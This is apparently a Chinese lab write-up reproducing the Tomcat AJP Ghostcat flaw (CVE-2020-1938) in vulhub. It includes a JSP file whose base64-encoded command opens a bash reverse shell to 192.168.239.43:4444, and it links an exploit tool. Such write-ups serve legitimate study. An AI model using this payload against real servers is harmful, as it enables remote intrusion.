vulhub中Aapache Tomcat AJP 文件包含漏洞复现(CVE-2020-1938)

查看tomcat默认页面,此时通过AJP协议的8009端口亦可访问Tomcat。

利用如下工具均可测试漏洞:

工具需要用到python2,

如果需要进一步利用需要向服务器的/webapps/ROOT目录下上传恶意文件

复制代码
<%Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS40My80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}");%>

利用工具https://github.com/00theway/Ghostcat-CNVD-2020-10487

进行执行上传的恶意文件

相关推荐
2601_9499506315 分钟前
Java 面试准备,用练题簿把“背过八股”变成“真正会答”
java·开发语言·面试·刷题·小程序推荐
無限進步D40 分钟前
Java 函数式编程(Lambda)
java·开发语言
rannn_1111 小时前
【力扣hot100】链表专题下|138、148、23、146
java·算法·leetcode·链表·开发
lv__pf1 小时前
Spring配置类解析 【TL spring 11】
java·前端·spring
zhougl9961 小时前
Java Spring Boot 爬虫技术全面介绍
java·spring boot·爬虫
奥莱维1 小时前
【无标题】
java·前端·javascript
风流 少年2 小时前
Spring AI 2.0:Hello World
java·人工智能·spring
qq_589666052 小时前
Java继承
java·开发语言
八角.。2 小时前
面向对象-多态
java·开发语言